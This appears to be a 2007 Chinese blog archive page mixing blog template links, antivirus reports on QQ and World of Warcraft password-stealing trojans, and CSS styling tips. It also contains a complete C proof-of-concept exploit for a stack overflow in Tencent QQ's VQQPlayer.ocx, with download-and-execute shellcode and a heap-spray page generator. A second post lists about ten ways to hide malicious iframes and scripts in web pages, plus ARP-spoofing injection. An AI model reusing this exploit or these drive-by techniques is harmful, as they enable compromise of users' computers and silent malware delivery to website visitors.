文章列表
 
2007-10-06 19:44

http://blog.sina.com.cn/hack999

博客开场特效代码                       新浪博客背景音乐及播放器的代码
自己做模板                       博客透明背景和透明背景地址
鼠标全集                               博客赚钱的方法博客代码
最新博客代码大全                         显示外部网页代码          
IE不挡的弹窗口代码                      弹出其他网页
                     
博客模板红粉佳人(动态)     
新浪博客模板 Poem时尚女郎    
新浪博客模板谁爱过谁(美女版)   
新浪博客模板夏季里的冰柠檬   
新浪博客模板低调的华丽       
新浪博客模板 Be happy         
新浪博客模板粉紅色高跟鞋   
新浪博客模板 简单&BOY        博客摸板--美女绣 新浪博客模板 夏天的味道---I can fly
新浪博客模板 红粉佳人(动态)
新浪博客模板红苹果的诱惑     
新浪博客模板粉红色城堡       
 
2007-10-06 19:43
博客开场特效代码                       新浪博客背景音乐及播放器的代码
自己做模板                       博客透明背景和透明背景地址
鼠标全集                               博客赚钱的方法博客代码
最新博客代码大全                         显示外部网页代码          
IE不挡的弹窗口代码                      弹出其他网页
                     
博客模板红粉佳人(动态)     
新浪博客模板 Poem时尚女郎    
新浪博客模板谁爱过谁(美女版)   
新浪博客模板夏季里的冰柠檬   
新浪博客模板低调的华丽       
新浪博客模板 Be happy         
新浪博客模板粉紅色高跟鞋   
新浪博客模板 简单&BOY        博客摸板--美女绣 新浪博客模板 夏天的味道---I can fly
新浪博客模板 红粉佳人(动态)
新浪博客模板红苹果的诱惑     
新浪博客模板粉红色城堡       
 
2007-08-12 10:33
魔兽木马变种C(Troj.PSWwow.c) 威胁级别:★

病毒特征:该木马是针对魔兽世界的,由于魔兽世界的火暴,大量的盗号木马也随之出现。

发作症状:该木马会监视用户的输入并将窃取到的账号纪录在一个文本文件中,随后发送到黑客指定的邮箱。金山毒霸提醒各位玩家,在娱乐的同时,也注意提稿警惕,严防盗号木马的入侵。



魔兽木马II(Troj.Wow.b) 威胁级别:★

病毒特征:这是一个魔兽世界的木马。感染系统后,潜伏在系统中监视魔兽世界的运行,运用系统挂钩技术记录用户在魔兽世界的区号信息、用户名和密码。

发作症状:当盗取成功后,病毒利用邮件发送给木马的安装者。由于网游的虚拟财富已经济价值,帐号密码的丢失将给用户带来间接或直接的经济损失。



“魔兽大盗”(Troj.Moshou.e) 威胁级别:★★

病毒特征:这是一个盗取网络游戏“魔兽”帐号和密码的木马病毒。

发作症状:木马病毒自动查找魔兽的窗口,安装消息钩子,截获用户输入信息,通过自带SMTP引擎发送到指定邮箱。该病毒还能从指定网址下载病毒文件并运行。该病毒必须重新启动机器后才能盗取魔兽密码,且盗号功能只针对WINDOWS XP以上的系统。



“魔兽木马变种D”(Troj.Wow.d) 威胁级别:★

病毒特征:这是一个魔兽世界木马病毒。它是一个捆绑型的木马,从表面上看起来是一个魔兽世界木马的生成器,可是在用户使用该木马生成器时,捆绑在生成器上的木马就会被释放出来,最终感染系统。

发作症状:伺机盗取用户帐号密码发送给病毒作者。
 
2007-08-09 18:44
 
2007-08-09 16:41

病毒报告:“QQ叛徒”(Trojan.QQbot.a)

发现日期:2004-5-25 10:32:32

简介:该病毒使用delphi编写,采用ASpack压缩,是一个通过监视QQ的消息来进行远程控制的木马。

一、病毒评估

1.病毒中文名: QQ叛徒

2.病毒英文名:Trojan.QQbot.a

3.病毒别名: 无

4.病毒大小:659456字节

5.病毒类型:木马

6.病毒危险等级:★★★★

7.病毒传播途径:网络

8.病毒依赖系统:Windows 95 Windows 98 Windows ME Windows 2000 Windows XP

二、病毒技术细节:

该病毒使用delphi编写,采用ASpack压缩,是一个通过监视QQ的消息来进行远程控制的木马。一旦运行,病毒将执行下列操作:

1.病毒将修改注册表,添加"registry" = "%CURBASE%\%CURFILE"到键值:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run下,这样病毒就可以随系统自启动。

2.病毒通过监视QQ的接收消息来响应远程控制端的操作:

病毒可以执行的操作包括:上传、下载、执行文件,共享硬盘,关闭、重启计算机,抓屏并发送EMail,通过进程名或ID来终止进程的运行,关闭、卸载木马等。

3.病毒的远程控制端通过生成相应的QQ消息来控制其服务端,发送的消息跟病毒进行的操作对应如下:

"去看看!wsdgs!!@@iXT 3;lGim OKdrk uLL&&ldUimlw$$"->此发送的消息为下载木马网址;(@@后面是随机字符)

"我看看!wsdgs@@0/$s^t&&"->此消息为从染毒机器中下载文件;

"你好啊!wsdgs@@1234567&&"->此消息为共享C盘;

"去试试!wsdgs@@iXT 3;lGim OKdrk uLL&&"->此消息执行文件;

"死机了?wsdgs"->关机;

"掉线了?wsdgs"->重启;

"在干嘛?wsdgs!!"->抓屏并Mail;

"还在啊?wsdgs!!"->列举进程并Mail;

"怎么了?wsdgs@@1234&&"->关闭进程;

"冷雨打芭蕉"->关闭对方QQ;

"江湖一剑飘"->关闭木马;

"天涯任逍遥"->卸载木马;

三、解决方案:

1.进行升级

瑞星公司将于当天进行升级,升级后的软件版本号为16.18.10,该版本的瑞星杀毒软件可以彻底查杀此病毒,瑞星杀毒软件标准版和网络版的用户可以直接登陆瑞星网站(http://www.rising.com.cn/)下载升级包进行升级,或者使用瑞星杀毒软件的“智能升级”功能。

2.使用在线杀毒和下载版

用户还可以使用瑞星公司的在线杀毒与下载版产品清除该病毒,这两款产品有多种支付途径,用户可以登陆网址:http://online.rising.com.cn/来使用在线杀毒产品,或者登陆网址: http://go.rising.com.cn/来使用下载版产品。

3.打电话求救

如果遇到关于该病毒的其它问题,用户可以随时拨打瑞星反病毒急救电话:010-82678800来寻求反病毒专家的帮助!

四、安全建议:

1.建立良好的安全习惯。例如:不要轻易打开一些来历不明的邮件及附件,不要上一些不太了解的网站,不要运行从互联网上下载的未经杀毒处理的软件等,这些必要的习惯会使您的计算机更加安全。

2.关闭或删除系统中不需要的服务。默认情况下,操作系统会安装一些辅助服务,如 FTP 客户端、Telnet 和 Web 服务器。这些服务为攻击者提供了方便,而又对用户没有太大作用,如果删除它们,就能大大减少被攻击的可能性,增强电脑的安全。

3.经常升级安全补丁。据统计,大部分网络病毒都是通过系统安全漏洞进行传播的,象冲击波、大无极、SCO炸弹、网络天空等。漏洞的存在,会造成杀毒杀不干净的状况,所以应该定期到微软网站去下载最新的安全补丁,堵住系统的漏洞。

4.使用复杂的密码。有许多网络病毒是通过猜测简单密码的方式攻击系统的,因此使用复杂的密码,将会大大提高计算机的安全系数,减少被病毒攻击的概率。

5.迅速隔离受感染的计算机。当您的计算机发现病毒或异常时应立刻断网,以防止计算机受到更多的感染,或者成为传播源,再次感染其它计算机。

6.了解一些病毒知识。这样您就可以及时发现新病毒并采取相应措施,在关键时刻使自己的计算机免受病毒破坏。如果能了解一些注册表知识,就可以定期看一看注册表的自启动项是否有可疑键值;如果能了解一些内存知识,就可以经常看看内存中是否有可疑程序。

7.最好是安装专业的防毒软件进行全面监控。在病毒日益增多的今天,使用杀毒软件进行防毒,是越来越经济的选择,不过用户在安装了反病毒软件之后,应该经常进行升级、将一些主要监控打开(如邮件监控)、遇到问题要及时上报,这样才能真正保障计算机的安全。 报告人:caijun

通过QQ即可控制电脑 全球首个QQ木马突现

如果收到这样的QQ信息:“掉线了?wsdgs”,然后系统无故重启,那么这个跟你聊天的“好友”就是一个恶意攻击者,你的系统已经被“QQ叛徒”病毒所感染。5月25日,瑞星全球反病毒监测网率先截获一个可利用QQ控制的木马,并将其命名为“QQ叛徒”(Trojan.QQbot.a)病毒。

据瑞星反病毒部门负责人蔡骏介绍,这是全球首个可以通过QQ控制系统的木马,感染该病毒之后,表面上看不出系统有任何异常,这些病毒QQ信息中大部分含有“wsdgs ”特殊字符,该病毒会造成强制系统重启、被迫下载病毒文件、抓取当前系统屏幕等等危害。

蔡骏介绍说,当QQ好友向你发送“你好啊!wsdgs@@1234567&&(@@之后的字符可变)”时,病毒就会共享系统的C盘;而“死机了?wsdgs”则会让系统关机,“掉线了?wsdgs”则会让系统重启,“冷语打芭蕉”会让你的QQ关闭。通过发送不同的QQ消息,攻击者可以进行多种非常危险的攻击性操作。

根据瑞星反病毒部门的分析,这个病毒的远程控制思路非常简单:病毒会随时检测QQ接收到的消息,当出现特殊的字符时,则进行相应的操作。传统的木马要进行控制必须开辟新的端口,被发现的可能性很大;而“QQ叛徒”这样的控制方式在防火墙看来是合法的,可以使大多数防火墙失效,相对来就更危险。

蔡骏提醒广大用户,当在使用QQ时,如收到含有“wsdgs”字样的信息,已经表明你已经中毒,此时应该立刻进行杀毒工作。为了防治系统被感染,广大用户应在第一时间升级杀毒软件,瑞星公司将在5月25日下午进行升级,瑞星杀毒软件16.28.10版即可彻底查杀此病毒。如果手中没有杀毒软件的用户,可以直接到瑞星网站下载其QQ专杀工具http://it.rising.com.cn/service/technology/RS_QQMsender.htm。此外,用户还可以随时拨打瑞星反病毒急救电话:010-82678800来寻求帮助。

中国网 2004年5月26日

 
2007-08-09 16:19

摘要:

QQ是由Tencent公司开发的一个IM软件,在中国有着非常广泛的用户。DSW Avert在200612.31发现了QQ的几个0day漏洞,并通知了QQ官方。QQ在2007.1.1进行了升级。事实上,在此之前,幻影旅团(ph4nt0m)的axis就已经发现了这些漏洞,出于一些原因未曾公布,现在漏洞被公开了,所以将细节和可利用的POC公布如下:

QQ的这几个漏洞,均是由于Activex Control造成的,相关dll分别是:VQQPLAYER.OCX,VQQsdl.dll,V2MailActiveX.ocx

其中有一个成功利用后,将可远程控制用户电脑,因为是activex的,所以只需要用户安装过QQ,甚至不需要其登录,就可以成功利用。

另外几个漏洞分别是拒绝服务漏洞,不可执行,在此不再赘述。

影响版本:

Tencent QQ2006正式版及之前所有版本。(未升级2007.1.1补丁)

细节:

在VQQPLAYER.OCX中,由于程序员的粗心,存在一个栈溢出漏洞,在函数返回时,可以控制EIP。

漏洞存在的Method是LaunchP2PShare,

ClassId是{AC3A36A8-9BFF-410A-A33D-2279FFEB69D2}

其原型是:

[id(0x00000030)]

VARIANT_BOOL LaunchP2PShare(

BSTR szExeName,

long nDuration);

第一个参数没有进行长度检查,为超长字符串时,将造成一个栈溢出。

幻影旅团将对此发布一个POC代码,请勿将此作为非法用途



POC:

----------------------------------------------------------------------------------------

/*

*-----------------------------------------------------------------------

*

* Tencent QQ VQQPlayer.ocx (all version) 0day

*

*

* Author: axis

* Date: 2006-12-27

* Mail: axis@ph4nt0m.org

*

* Bug discovered by axis@ph4nt0m.org

* :

* :

* :

* :

* :Usage: filename <exe_URL> [htmlfile]

* : filename.exe http://site.com/file.exe localhtml.htm

*

* 在VQQPlayer.ocx中的LaunchP2PShare函数的第一个参数没有做边界检查,超长将在MFC42.dll覆盖到eip和seh

* QQ是vc6编译的,所以可以用覆盖返回地址的方法,不过要求覆盖eip和以前的是可见字符,要求比较苛刻

* 而且覆盖返回地址的方法,和QQ安装路径有关,因为是这样覆盖起 c:\program files\tencent\qq\AAAAA....

* 覆盖seh方法比较通用,使用heap spray的方法,跳到0x0c0c0c0c中去执行shellcode,但是会关闭ie。

*

*

*

*

04534E5F 55 PUSH EBP

04534E60 8BEC MOV EBP,ESP

04534E62 81EC 60060000 SUB ESP,660

04534E68 53 PUSH EBX

04534E69 33DB XOR EBX,EBX

04534E6B 395D 08 CMP DWORD PTR SS:[EBP+8],EBX

04534E6E 56 PUSH ESI

04534E6F 57 PUSH EDI

04534E70 8BF1 MOV ESI,ECX

04534E72 75 11 JNZ SHORT VQQPLA~1.04534E85

04534E74 C786 8C040000 1>MOV DWORD PTR DS:[ESI+48C],12

04534E7E 33C0 XOR EAX,EAX

04534E80 E9 42010000 JMP VQQPLA~1.04534FC7

04534E85 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]

04534E88 3BC3 CMP EAX,EBX

04534E8A 8945 0C MOV DWORD PTR SS:[EBP+C],EAX

04534E8D 7F 07 JG SHORT VQQPLA~1.04534E96

04534E8F C745 0C 0A00000>MOV DWORD PTR SS:[EBP+C],0A

04534E96 BF 04010000 MOV EDI,104

04534E9B 8D85 A0FDFFFF LEA EAX,DWORD PTR SS:[EBP-260]

04534EA1 57 PUSH EDI

04534EA2 53 PUSH EBX

04534EA3 50 PUSH EAX

04534EA4 E8 437F0000 CALL <JMP.&MSVCRT.memset>

04534EA9 57 PUSH EDI

04534EAA 8D85 A4FEFFFF LEA EAX,DWORD PTR SS:[EBP-15C]

04534EB0 53 PUSH EBX

04534EB1 50 PUSH EAX

04534EB2 E8 357F0000 CALL <JMP.&MSVCRT.memset>

04534EB7 83C4 18 ADD ESP,18

04534EBA 897D FC MOV DWORD PTR SS:[EBP-4],EDI

04534EBD E8 6E780000 CALL <JMP.&MFC42.#1168_?AfxGetModuleStat>

04534EC2 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]

04534EC5 8B78 6C MOV EDI,DWORD PTR DS:[EAX+6C]

04534EC8 8D85 A4FEFFFF LEA EAX,DWORD PTR SS:[EBP-15C]

04534ECE 57 PUSH EDI

04534ECF 50 PUSH EAX

04534ED0 E8 C3250000 CALL VQQPLA~1.04537498

04534ED5 FF75 08 PUSH DWORD PTR SS:[EBP+8]

04534ED8 8D85 A4FEFFFF LEA EAX,DWORD PTR SS:[EBP-15C]

04534EDE 50 PUSH EAX

04534EDF E8 027F0000 CALL <JMP.&MSVCRT.strcat> ; 溢出



[ebp-15c]处是QQ安装目录, [ebp+8]处是传递的第一个参数



shellcode使用 add esp, 4dch

pop ebp

retn 24h

安全退出返回到上层函数 mshtml.dll里

*

*------------------------------------------------------------------------

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

FILE *fp = NULL;

char *file = "fuck_exp1.html";

char *url = NULL;



//Download Shellcode by swan@0x557 bypass防火墙

// 经axis@ph4n0m加入了恢复栈平衡,不挂ie

unsigned char sc[] =

"\x60\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x70"

"\x08\x81\xec\x00\x04\x00\x00\x8b\xec\x56\x68\x8e\x4e\x0e\xec\xe8"

"\xff\x00\x00\x00\x89\x45\x04\x56\x68\x98\xfe\x8a\x0e\xe8\xf1\x00"

"\x00\x00\x89\x45\x08\x56\x68\x25\xb0\xff\xc2\xe8\xe3\x00\x00\x00"

"\x89\x45\x0c\x56\x68\xef\xce\xe0\x60\xe8\xd5\x00\x00\x00\x89\x45"

"\x10\x56\x68\xc1\x79\xe5\xb8\xe8\xc7\x00\x00\x00\x89\x45\x14\x40"

"\x80\x38\xc3\x75\xfa\x89\x45\x18\xe9\x08\x01\x00\x00\x5e\x89\x75"

"\x24\x8b\x45\x04\x6a\x01\x59\x8b\x55\x18\x56\xe8\x8c\x00\x00\x00"

"\x50\x68\x36\x1a\x2f\x70\xe8\x98\x00\x00\x00\x89\x45\x1c\x8b\xc5"

"\x83\xc0\x50\x89\x45\x20\x68\xff\x00\x00\x00\x50\x8b\x45\x14\x6a"

"\x02\x59\x8b\x55\x18\xe8\x62\x00\x00\x00\x03\x45\x20\xc7\x00\x5c"

"\x7e\x2e\x65\xc7\x40\x04\x78\x65\x00\x00\xff\x75\x20\x8b\x45\x0c"

"\x6a\x01\x59\x8b\x55\x18\xe8\x41\x00\x00\x00\x6a\x07\x58\x03\x45"

"\x24\x33\xdb\x53\x53\xff\x75\x20\x50\x53\x8b\x45\x1c\x6a\x05\x59"

"\x8b\x55\x18\xe8\x24\x00\x00\x00\x6a\x00\xff\x75\x20\x8b\x45\x08"

"\x6a\x02\x59\x8b\x55\x18\xe8\x11\x00\x00\x00\x81\xc4\x00\x04\x00"

"\x00\x61\x81\xc4\xdc\x04\x00\x00\x5d\xc2\x24\x00\x41\x5b\x52\x03"

"\xe1\x03\xe1\x03\xe1\x03\xe1\x83\xec\x04\x5a\x53\x8b\xda\xe2\xf7"

"\x52\xff\xe0\x55\x8b\xec\x8b\x7d\x08\x8b\x5d\x0c\x56\x8b\x73\x3c"

"\x8b\x74\x1e\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49\x41"

"\xad\x03\xc3\x56\x33\xf6\x0f\xbe\x10\x3a\xf2\x74\x08\xc1\xce\x0d"

"\x03\xf2\x40\xeb\xf1\x3b\xfe\x5e\x75\xe5\x5a\x8b\xeb\x8b\x5a\x24"

"\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5"

"\x5e\x5d\xc2\x08\x00\xe8\xf3\xfe\xff\xff\x55\x52\x4c\x4d\x4f\x4e"

"\x00";

char * header =

"<!-- axis' exploit! -->\n\n"

"<html>\n"

"<head>\n"

"<script language=\"javascript\">\n"

"\tvar heapSprayToAddress = 0x0c010101;\n"

"\tvar shellcode = unescape(\"%u9090\"+\"%u9090\"+ \n";



char * footer =

"\n"

"var heapBlockSize = 0x100000;\n" //如果太小了,会造成时间上来不及分配,导致溢出失败

"var payLoadSize = shellcode.length * 2;\n"

"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n"

"var spraySlide = unescape(\"%u9090%u9090\");\n"

"spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n"

"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;\n"

"memory = new Array();\n\n"

"for (i=0;i<heapBlocks;i++)\n{\n"

"\t\tmemory[i] = spraySlide + shellcode;\n}\n"

"function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t"

"while (spraySlide.length*2<spraySlideSize)\n\t"

"{\n\t\tspraySlide += spraySlide;\n\t}\n"

"\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n"

"</script>\n";

char * trigger =

"\n<script>\n"

"function AxisFun()\n"

"{\n"

"\tevil.LaunchP2PShare(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\", 10000);\n"

"\n}\n"

"</script>\n"

"</head>\n"

"<OBJECT ID=\"evil\" CLASSID=\"CLSID:{AC3A36A8-9BFF-410A-A33D-2279FFEB69D2}\"></OBJECT>\n"

"<script>java script:AxisFun();</script>\n"

"</html>\n";



// print unicode shellcode

void PrintPayLoad(char *lpBuff, int buffsize)

{

int i;

for(i=0;i<buffsize;i+=2)

{

if((i%16)==0)

{

if(i!=0)

{

printf("\"\n\"");

fprintf(fp, "%s", "\" +\n\"");

}

else

{

printf("\"");

fprintf(fp, "%s", "\"");

}

}

printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);

fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);

}



//把shellcode打印在header后面,然后用 " ) " 闭合

printf("\";\n");

fprintf(fp, "%s", "\");\n");



fflush(fp);

}



void main(int argc, char **argv)

{

unsigned char buf[1024] = {0};

int sc_len = 0;



if (argc < 2)

{

printf("Tencent QQ VQQPlayer.ocx (all version) 0day!\n");

printf("Bug Found by axis@ph4nt0m\n");

printf("Date: 2006-12-27\n");

printf("\r\nUsage: %s <URL> [Local htmlfile]\r\n\n", argv[0]);

exit(1);

}

url = argv[1];



if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)

{

printf("[-] Invalid url. Must start with 'http://','ftp://'\n");

return;

}

printf("[+] download url:%s\n", url);

if(argc >=3) file = argv[2];

printf("[+] exploit file:%s\n", file);

fp = fopen(file, "w");

if(!fp)

{

printf("[-] Open file error!\n");

return;

}



//build evil html file

fprintf(fp, "%s", header);

fflush(fp);

memset(buf, 0, sizeof(buf));

sc_len = sizeof(sc)-1;

memcpy(buf, sc, sc_len);

memcpy(buf+sc_len, url, strlen(url));

sc_len += strlen(url)+1;

PrintPayLoad((char *)buf, sc_len);

fprintf(fp, "%s", footer);

fflush(fp);

fprintf(fp, "%s", trigger);

fflush(fp);

printf("[+] exploit write to %s success!\n", file);

}

----------------------------------------------------------------------------------------



建议:

禁止ie执行activex



 
2007-08-09 15:59
网页木马代码大全



一:框架挂马



      <iframe src=地址 width=0 height=0></iframe>



二:js文件挂马

   

      首先将以下代码

      document.write("<iframe width='0' height='0' src='地址'></iframe>");

      保存为xxx.js,

      则JS挂马代码为

      <script language=javascript src=xxx.js></script>



三:js变形加密

   

      <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

      muma.txt可改成任意后缀

四:body挂马



      <body onload="window.location='地址';"></body>



五:隐蔽挂马



      top.document.body.innerHTML = top.document.body.innerHTML +       '\r\n<iframe src="http://www.linglihu.com/"></iframe>';



六:css中挂马



      body {

      background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}



七:JAJA挂马



     <SCRIPT language=javascript>      

     window.open     ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro     llbars=no,width=1,height=1");  

     </script>



八:图片伪装



     <html>

     <iframe src="网马地址" height=0 width=0></iframe>

     <img src="图片地址"></center>

     </html>



九:伪装调用



      <frameset rows="444,0" cols="*">

      <frame src="打开网页" framborder="no" scrolling="auto" noresize       marginwidth="0"margingheight="0">

      <frame src="网马地址" frameborder="no" scrolling="no"      noresize       marginwidth="0"margingheight="0">

      </frameset>



十:高级欺骗



      <a href="http://www.linglihu.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>

<SCRIPT Language="JavaScript">

function www_163_com ()

{

var url="网马地址";

open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");

}

//摘自老虎的bloghttp://www.linglihu.com/article.asp?id=18

</SCRIPT>



十一: 超级网马—通过arp欺骗来直接挂马



原理:arp中间人攻击,实际上相当于做了一次代理。



正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机

arp中间人攻击时候: A---->C---->B

B---->C---->A

实际上,C在这里做了一次代理的作用



那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。



如何处理网页木马:

1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm



2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...



3、修改键值wm.htm为wm_nnd.htm。



4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。

     cain.exe,据说是密码嗅探器。



5、修改键值cain.exe为cain_nnd.exe。



6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。



7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。



8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序



9、发现temp*.exe(全名记不清了),立马net stop server 。



10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。



11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。



12、观察了几天,没再发生挂马的现象。 另外,通过检测网络连接查看服务器是否中了木马或病毒



1、使用netstat -an 查看所有和本地计算机建立连接的IP。



2、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。 通过这个命令的详细信息,可以完全监控计算机上的连接,从而达到控制计算机的目的。



3、手工制作bat程序,生成网络连接日志文件供站长分析:bat文件代码如下



REM 注释:监控的时间

REM ://摘自老虎的bloghttp://www.linglihu.com/article.asp?id=18

time /t>>Netstat.log

REM 每隔30秒,把服务器上通过tcp协议通讯的IP和端口写入日志文件

Netstat -n -p tcp 30>>Netstat.log




注意:要谨慎使用,这会给服务器带来性能影响。最好,在服务器发生异常,怀疑中木马或病毒时,用来分析网络连接日志。



仅仅这些还不够,说说更严重的:



1、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户,但这个账户是不经常用的, 然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。

  

2、赶快检测系统帐户

a、在命令行下输入net user,查看计算机上有些什么用户。

b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。

c、一般除了Administrator是administrators组的,如果你发现一个系统内置的用户是属于administrators组的,

       那么别人在你的计算机上克隆账户的概率为90%。

d、是使用“net user 用户名 /del” 来删掉这个用户,还是修改其它配置,这你说了算。

//本文摘自:老虎的bloghttp://www.linglihu.com/article.asp?id=18
 
2007-08-09 11:24
 
2007-08-09 9:37
改变模板效果的代码汇总
改变背景:
滚动的大背景代码:
<DIV> </DIV><style>body {background:url("页面大背景图片地址") repeat scroll!important;}</style>
滚动的大背景,使用的是小图片,闪烁的星空呀什么的,它会自动平铺成为整张背景。
固定的大背景代码
<DIV> </DIV><style>body {background:url("页面大背景图片地址") repeat fixed!important;}<style>
固定的大背景,请在一些壁纸网站找一些壁纸图片,这样背景才够大。
两种代码,请选择其中一种!

改变横幅:
代码如下:
<DIV> </DIV><STYLE type=text/css>.banner {background:url("头部大横幅图片地址") no repeat no scroll!mportant;}</STYLE>
注意:覆盖图片地址的时候,千万不要把代码中:("页面大背景图片地址") 中的“”去掉,否则显示的是白色,没有图片效果!

全部透明:
代码如下:
<DIV> </DIV><STYLE type=text/css> .logo {background:#transparent} .banner {background:#transparent} .menu {background:#transparent} .feeds .up {background:#transparent} .feeds .down {background:#transparent} .feeds .function {background:#transparent} .links .up {background:#transparent} .links .down {background:#transparent} .links .mid {background:#transparent} .photo .mid {background:#transparent} .label .mid {background:#transparent} .calendar .mid {background:#transparent} .callboard .up {background:#transparent} .callboard .down {background:#transparent} .callboard .mid {background:#transparent} .bodyBg {background:#transparent} .bodyBottom {background:#transparent} .sysW770 {background:#transparent} .gbook .up {background:#transparent} .gbook .down {background:#transparent} .feeds .page {background:#transparent} .links .more {background:#transparent} .add {background:#transparent} .add .ico {background:#transparent} </STYLE>
使用全部透明代码,请更换系统模板,选择灰色轨迹模板,并且配合固定的大背景代码使用。

透明背景上的半透明蒙纱效果:
代码如下:
<DIV> </DIV><STYLE type=text/css> .logo {background:#transparent} .banner {background:#transparent} .menu {background:#transparent} .feeds .up {background:#transparent} .feeds .down {background:#transparent} .feeds .function {background:#transparent} .links .up {background:#transparent} .links .down {background:#transparent} .links .mid {background:#transparent} .photo .mid {background:#transparent} .label .mid {background:#transparent} .calendar .mid {background:#transparent} .callboard .up {background:#transparent} .callboard .down {background:#transparent} .callboard .mid {background:#transparent} .bodyBg {background:#transparent;filter:progid:DXImageTransform.Microsoft.gradient(GradientType ='1',enabled='true',startColorstr=#AAFFFFFF, endColorstr=#AAFFFFFF);} .bodyBottom {background:#transparent} .sysW770 {background:#transparent} .gbook .up {background:#transparent} .gbook .down {background:#transparent} .feeds .page {background:#transparent} .links .more {background:#transparent} .add {background:#transparent} .add .ico {background:#transparent} </STYLE>
如何修改蒙纱的透明度:
如果你感觉蒙纱效果看文字费劲,可以修改代码中的:
startColorstr=#55FFFFFF
endColorstr=#55FFFFFF  
前面的55是透明度,修改成FF是不透明,修改成AA是中间值,修改成00是全透明,然后可以往上增加,112233等等,数字越大,透明度越底。可以根据自己的需要决定透明度.
后面的 FFFFFF 是颜色,就是说在上面蒙什么颜色的东西,可以根据 颜色代码表 上 中颜色代码来修改颜色。
使用半透明蒙纱效果,请更换系统模板,选择灰色轨迹模板,并且配合固定的大背景代码使用。

全部透明代码与透明背景上的半透明蒙纱效果,只能选择其中一种使用。

两侧掛件(对联)的添加方法:

